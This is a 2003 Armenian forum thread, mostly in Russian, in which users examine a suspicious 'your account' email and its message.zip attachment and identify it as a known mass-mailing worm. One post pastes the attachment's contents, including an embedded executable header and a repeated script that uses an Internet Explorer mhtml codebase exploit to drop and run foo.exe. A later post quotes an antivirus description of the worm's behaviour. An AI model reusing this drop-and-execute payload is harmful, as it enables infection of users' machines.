Armenian Knowledge Base  

Go Back   Armenian Knowledge Base > General Discussions > General
Register

Reply
 
LinkBack Thread Tools
Old 05.08.2003, 21:18   #1
Moderator
 
Mono's Avatar
 
Join Date: 10 2001
Location: Yerevan
Posts: 5,466
Downloads: 1
Uploads: 0
Blog Entries: 1
Reputation: 110 | 5
Question Хакеры атакуют....

смотрите что уже получаю второй день


---



Hello there,

I would like to inform you about important information regarding your
email address. This email address will be expiring.
Please read attachment for details.

---
Best regards, Administrator
fdqftckt

----


А вот это хедерс так сказать

----

Return-Path: <[email protected]>
Received: from styx.aic.net (styx.aic.net [195.250.64.68])
by gampr.freenet.am (8.12.9/8.12.9) with ESMTP id h728oRXC002023
for <[email protected]>; Sat, 2 Aug 2003 13:50:27 +0500 (AMST)
Received: from [217.113.7.194] (helo=localhost)
by styx.aic.net with smtp (Exim 4.20)
id 19is5b-000CWQ-9A
for [email protected]; Sat, 02 Aug 2003 13:50:14 +0500
From: [email protected]
To: Mono <[email protected]>
Reply-To: [email protected]
X-Mailer: The Bat! (v1.61)
X-Priority: 2 (High)
Subject: your account fdqftckt
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----------18AB777E094567B"
Message-Id: <[email protected]>
Date: Sat, 02 Aug 2003 13:50:14 +0500
Content-Length: 26147
Status:

------

С атачед файлом message.zip.

Koroche ya yego ne optkril.

Chto skajete.

1. Virus li eto ??
2. Hakeri ??
3. ili je vpravdu konec Freenetu ??
__________________
---------------
Արատտայի ու Խալդեյի հովանավոր .
Reply With Quote
Old 05.08.2003, 21:25   #2
freelancer
 
Yerkanian's Avatar
 
Join Date: 06 2002
Location: the same place
Posts: 592
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Default

kto-to iz clientov Web-a posilayet trojan mail cherez mail server Arminco chaynikam FreeNeta
Reply With Quote
Old 05.08.2003, 21:35   #3
Moderator
 
Mono's Avatar
 
Join Date: 10 2001
Location: Yerevan
Posts: 5,466
Downloads: 1
Uploads: 0
Blog Entries: 1
Reputation: 110 | 5
Default

Yerkanian

eto ZIp fayl ili Exe fayl po tvoemu
Reply With Quote
Old 05.08.2003, 21:44   #4
freelancer
 
Yerkanian's Avatar
 
Join Date: 06 2002
Location: the same place
Posts: 592
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Default

tol'ko chaynik mozhet podumat' otkrit' takoy attachment.

stiray nafig... a esli somnevayeshsya, pozvoni v administration i sprosi posilali oni takoy email.

elementarno...
Reply With Quote
Old 05.08.2003, 21:54   #5
Пожарник - огнеУтешител
 
Art007's Avatar
 
Join Date: 03 2002
Location: Yerevan
Age: 41
Posts: 1,056
Downloads: 1
Uploads: 0
Reputation: 2 | 0
Default

ne toko freenetovcam, sednya ya toje poluchil tochno to je pis'mo s takimi je header-ami na yahoo mail prosto delete
Reply With Quote
Old 05.08.2003, 22:00   #6
Moderator
 
Mono's Avatar
 
Join Date: 10 2001
Location: Yerevan
Posts: 5,466
Downloads: 1
Uploads: 0
Blog Entries: 1
Reputation: 110 | 5
Default

Ребята я не так выразился.

Мне интересно. Зип ли файл это? Если да то внутри может Ексешник есть или как??

либо же этот зип файл который использует баг в винзипе чтобы троянить через винзип.

либо же это не зип файл а эксешник.

Мне как то интересно что внутри
Reply With Quote
Old 05.08.2003, 22:24   #7
freelancer
 
Yerkanian's Avatar
 
Join Date: 06 2002
Location: the same place
Posts: 592
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Default

mda, curiousity killed the rabit

kakim-to vieworom posmotri soderzhimoye - esli perviye dva simvola "MZ" - znachit exe ryadishkom budet navernoe i "This program cannot be run in DOS mode."
Reply With Quote
Old 05.08.2003, 22:53   #8
Moderator
 
Mono's Avatar
 
Join Date: 10 2001
Location: Yerevan
Posts: 5,466
Downloads: 1
Uploads: 0
Blog Entries: 1
Reputation: 110 | 5
Default

interesno odnako smotrite na vnutrennosti etogo fayla

ne zrya je ya tak pilal curiositom

===========

PK__
[email protected]__•I_____message.htmlMIME-Version: 1.0
Content-Location:File://foo.exe
Content-Transfer-Encoding: binary

MZђ_________яя__ё_______@___________________________________Ђ_____є__ґ Н!ё_LН!This program cannot be run in DOS mode. $_______PE__L___ЁќЈ?________а___


+
+
+


<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script>PK____
[email protected]__•I___________ _______message.htmlPK__________:___їI____
Reply With Quote
Old 05.08.2003, 22:58   #9
холостяк и точка.
 
Medved Kosolapiy's Avatar
 
Join Date: 03 2002
Location: Live?
Age: 34
Posts: 6,942
Downloads: 2
Uploads: 0
Reputation: 515 | 6
Default

Наверно БАТ файл с иконкой Зипа
так "Мп3" рассылали типа, БАт файл а инонка ВинАмпа, никто даже не подумал подумать почему если даже в компе нету винама иконка такая?!
Reply With Quote
Old 05.08.2003, 23:04   #10
Banned
 
DaNYer's Avatar
 
Join Date: 10 2002
Location: Brooklyn, New York
Age: 39
Posts: 3,760
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Default

Interesno etot virus na trojan ne poxoj... on chto tol'ko "moo ha ha" kaet?

kstati mojet eto on ---> obyavlenie iz yahoo:
Reply With Quote
Old 05.08.2003, 23:08   #11
Banned
 
DaNYer's Avatar
 
Join Date: 10 2002
Location: Brooklyn, New York
Age: 39
Posts: 3,760
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Default

i eshe zdes':
http://securityresponse.symantec.com...[email protected]

virus identificirovan!!!
Quote:
When [email protected] is run, it does the following:


Copies itself to %Windir%\Videodrv.exe.


Adds the value:

"VideoDriver"="%Windir%\videodrv.exe"

to the registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

so that [email protected] runs when you start Windows.


Collects email addresses from all the files except those with the following file extensions:
.bmp
.jpg
.gif
.exe
.dll
.avi
.mpg
.mp3
.vxd
.ocx
.psd
.tif
.zip
.rar
.pdf
.cab
.wav
.com


Writes all the email addresses to the file, %Windir%\eml.tmp, if it can resolve www.google.com to any IP address.


Captures text from specific windows and sends the data to email addresses that the worm contains.


Uses its own SMTP server to spread by email.
The email has the following characteristics:

From: admin@<current domain> (The from address may be spoofed to appear that it is coming from the current domain)

Subject: your account %s

Message:
Hello there,
I would like to inform you about important information regarding your email address. This email address will be expiring. Please read attachment for details.

Best regards,
Administrator

Attachment: Message.zip


Message.zip contains only one file, Message.htm, which uses a code base exploit to create a copy of the worm named Foo.exe in the Temporary Internet Files folder, and then runs it. The compression method of this file inside the zip file is stored so that compression is not used at all.

Information about this vulnerability and a Microsoft patch is located at: http://support.microsoft.com/default...;en-us;330994. We encourage system administrators to apply the Microsoft patch to prevent infection by this worm.


When the HTML file is executed, it will cause the following registry key to be created:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{11111111-1111-1111-1111-111111111111}


The worm creates two additional files in the %Windir% folder:
Zip.tmp: This is a temporary copy of message.zip (30,079 bytes).
Exe.tmp: This is a temporary copy of message.html (29,957 bytes).
Reply With Quote
Old 06.08.2003, 04:51   #12
Грустно...
 
Agregat's Avatar
 
Join Date: 08 2002
Location: Там, где всегда идут дожди
Age: 35
Posts: 21,717
Downloads: 2
Uploads: 0
Reputation: 250 | 7
Default

так как майл адреса [email protected] не существует надо сразу это письмо подальше послать и хрен с аттачментом
Reply With Quote
Old 06.08.2003, 06:07   #13
Академик
 
greka's Avatar
 
Join Date: 09 2001
Location: inside myself
Posts: 5,369
Downloads: 0
Uploads: 0
Reputation: 18 | 5
Default

я аттачменты всегда в NOTEPAD кидаю.

header-ы очень просто распознать - экзешник это, скрипт, WinZIP или т.п. - просто попробуйте это на обычных файлах и заметите в начальных байтах общую инфу.




А вот Арминко за такие действия отвечать должен, или нет ?
Reply With Quote
Old 06.08.2003, 06:49   #14
The Reloaded
 
Aram Hambardzumyan's Avatar
 
Join Date: 01 2002
Location: behind the flesh and gelatinе of soft dull eyes
Posts: 3,387
Downloads: 4
Uploads: 0
Reputation: 146 | 4
Default

я тоже получал такое письмо. в атаче нормальный зип. в зипе сидит html-файл, часть которого составляет экзешник. наверное если открыть в ie, что-нибудь да и случится...
Reply With Quote
Old 06.08.2003, 06:52   #15
The Reloaded
 
Aram Hambardzumyan's Avatar
 
Join Date: 01 2002
Location: behind the flesh and gelatinе of soft dull eyes
Posts: 3,387
Downloads: 4
Uploads: 0
Reputation: 146 | 4
Default

Quote:
Originally posted by Greco El
А вот Арминко за такие действия отвечать должен, или нет ?
если это их юзер, то они должны надрать ему уши. вот как заставить их это сделать, не знаю. однажды я от клиента нетсиса получил подозрительное письмо, сообщил им, и ни ответа, ни привета. мочить таких провайдеров надо
Reply With Quote
Sponsored Links
Reply

Thread Tools


На правах рекламы:
реклама

All times are GMT. The time now is 17:46.


Powered by vBulletin® Copyright ©2000 - 2017, Jelsoft Enterprises Ltd.